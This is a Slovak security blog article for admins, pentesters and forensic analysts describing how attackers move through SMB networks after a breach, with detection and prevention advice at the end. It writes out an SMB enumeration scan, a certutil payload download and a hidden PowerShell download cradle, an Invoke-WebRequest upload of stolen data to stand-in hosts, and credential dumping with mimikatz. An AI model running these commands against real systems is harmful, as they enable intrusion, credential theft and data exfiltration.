Po prieniku do siete sa útočník nikdy nezastaví. Naopak – rozbehne sa ako tieň, systematicky analyzuje prostredie, zhromažďuje prihlasovacie údaje a hľadá cesty, ako sa nepozorovane presunúť ďalej. Najčastejšie taktiky v SMB sieti sa v tejto fáze prejavujú v plnej sile. Protokol SMB a zdieľané sieťové zdroje často poskytujú dokonalý priestor na tichú inváziu. SMB často funguje ako skrytá brána do vnútornej infraštruktúry, kde sa strácajú hranice medzi oprávneniami a neviditeľnou eskaláciou.
Tento článok slúži ako komplexný sprievodca pre adminov, penetračných testerov a forenzných analytikov, ktorí chcú pochopiť, ako útočník postupuje po prieniku a ako proti nemu efektívne zasiahnuť. Ak vieš, čo sleduje útočník, dokážeš predvídať jeho kroky a eliminovať hrozbu ešte predtým, ako si vytvorí stabilnú pozíciu v sieti.
🪖 1. Získaj foothold, potom skenuj SMB
Po úspešnom prieniku si útočník zabezpečí prvotný prístup (foothold). Následne spustí sieťový sken a zameria sa na port 445 (SMB). Jeho cieľom je nájsť zdieľané priečinky, ktoré môžu obsahovať citlivé dáta alebo umožniť ďalší prístup. V mnohých prípadoch narazí na interné zdieľané zdroje s oprávneniami typu „Everyone: Full Access“, ktoré ostali roky bez kontroly. Práve tieto zraniteľnosti mu otvárajú cestu hlbšie do infraštruktúry bez potreby ďalšieho útoku.
Prakticky:
|
1 |
nmap -p445 --script smb-enum-shares,smb-enum-users 10.0.0.0/24 |
Pre pokročilejšiu analýzu pridaj aj --script smb-vuln*, ktorý overí známe zraniteľnosti ako EternalBlue, SMBGhost a ďalšie.
🔸 2. Zneužívaj LOLBins na exfiltráciu alebo laterálny pohyb
Namiesto použitia malware nasadí útočník príkazový riadok a využije systémové binárky známe ako LOLBins (Living off the Land Binaries). Tieto nástroje sú bežnou súčasťou systému Windows a preto nevyvolávajú podozrenie bezpečnostných riešení.
Príklady:
|
1 |
certutil -urlcache -split -f http://malicious.com/payload.exe C:\Users\Public\payload.exe |
Alebo:
|
1 |
powershell -ep bypass -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.3/shell.ps1')" |
Útočník môže naplánovať periodické spúšťanie týchto príkazov pomocou Plánovača úloh (Task Scheduler), čím zabezpečí kontinuálny zber údajov alebo ich exfiltráciu bez zásahu používateľa.
Zraniteľnosť: Slabo nastavené AppLocker pravidlá, chýbajúce whitelisting politiky, povolenie PowerShellu bez auditovania, nedostatočný monitoring systémových procesov.
🏛️ 3. Pivotuj cez RDP chainy
Po získaní prístupu k jednému hostovi využíva útočník techniku laterálneho pohybu. Pomocou získaných prihlasovacích údajov (napr. cez Mimikatz alebo LSASS dump) sa presúva medzi hostiteľmi prostredníctvom RDP chainingu. Táto technika umožňuje prechod medzi rôznymi segmentmi siete, čím si útočník vytvára stále väčší manévrovací priestor.
Postup:
- Získaj prihlasovacie údaje cez
mimikatz,procdumpalebocomsvcs.dll - Použi nástroje ako
xfreerdp,rdesktopalebomstscna pripojenie k RDP relácii - Aktivuj keylogger, dumpuj SAM databázu, alebo zhromažďuj ďalšie prístupové tokeny
- Opakuj proces pri každom nájdenom dostupnom zariadení
Dôsledok: Útočník si vytvorí mapu celej siete, eskaluje oprávnenia a pripraví si priestor pre perzistenciu alebo ďalšie útočné fázy.
🔫 4. Zber a exfiltrácia dát cez „net use“
Pomocou príkazu net use útočník mapuje zdieľané disky a zisťuje, ktoré obsahujú citlivé údaje:
|
1 |
net use x: \\10.0.0.5\share /user:domain\user heslo |
Z takto namapovaného disku následne sťahuje dôverné dokumenty, súbory s prihlasovacími údajmi alebo interné skripty s tokenmi. Dáta kopíruje pomocou PowerShellu, FTP klientov alebo nástrojov ako RClone.
Typické ciele:
\IT\Backups\passwords.xlsx\Finance\Budget\2024.xlsm\HR\Contracts\2025.docx
Exfiltrácia:
|
1 |
Invoke-WebRequest -Uri http://malicious.site/upload -Method POST -InFile C:\loot\secrets.zip |
V niektorých prípadoch útočník komprimuje súbory, zašifruje ich a odošle na externý server, čím zníži riziko detekcie a zvýši efektivitu prenosu.
🚫 5. Detekcia a prevencia tichého pohybu
Ako forenzný špecialista alebo admin sa zameraj na detekciu neobvyklých aktivít. Venuj pozornosť najmä:
- Prístupom mimo pracovných hodín alebo z neznámych IP adries
- Nezvyčajne častým alebo opakujúcim sa RDP reláciám
- Spúšťaniu PowerShell skriptov bez legitímneho dôvodu
- Skenom SMB z netradičných segmentov siete
- Používaniu systémových nástrojov mimo bežného kontextu
Odporúčané opatrenia:
- Aktivuj auditovanie PowerShellu, RDP a SMB aktivity
- Vytvor falošné zdieľané priečinky (HoneyShare) a sleduj, kto ich navštevuje
- Obmedz spúšťanie LOLBins pomocou AppLocker alebo GPO
- Zavedi segmentáciu siete a časovo obmedzený prístup na kritické systémy
- Využi SIEM systém s koreláciou udalostí a nastavením prahových hodnôt
🌟 Záver: Mysli ako tieň
Útočník sa po prieniku nepomáli. Sleduje, pozoruje a zneužíva. Tichá vojna v SMB sa nedeje na povrchu, ale medzi packetmi, skriptami a zle nastavenými oprávneniami. Najčastejšie taktiky v SMB sieti zahŕňajú presne tento typ tichého a nenápadného pohybu, pri ktorom si útočník hľadá ideálne podmienky na perzistenciu. Každý otvorený port a každá zdieľaná zložka môžu slúžiť ako vstupná brána do systému. Preto ako admin, pentester či forenzný analytik musíš myslieť ako on. Nie preto, aby si útok spôsobil, ale aby si mu zabránil. Každé preventívne opatrenie, ktoré urobíš dnes, ti môže zajtra ochrániť sieť pred stratou dát alebo kompromitáciou celej infraštruktúry.
🛑 Právne upozornenie
Tento článok slúži výhradne na vzdelávacie a informačné účely. Nezodpovedám za žiadne škody alebo zneužitie uvedených informácií. Každý čitateľ nesie plnú zodpovednosť za svoje konanie. Praktické techniky uvedené v texte používaj len vo svojom testovacom alebo schválenom prostredí.
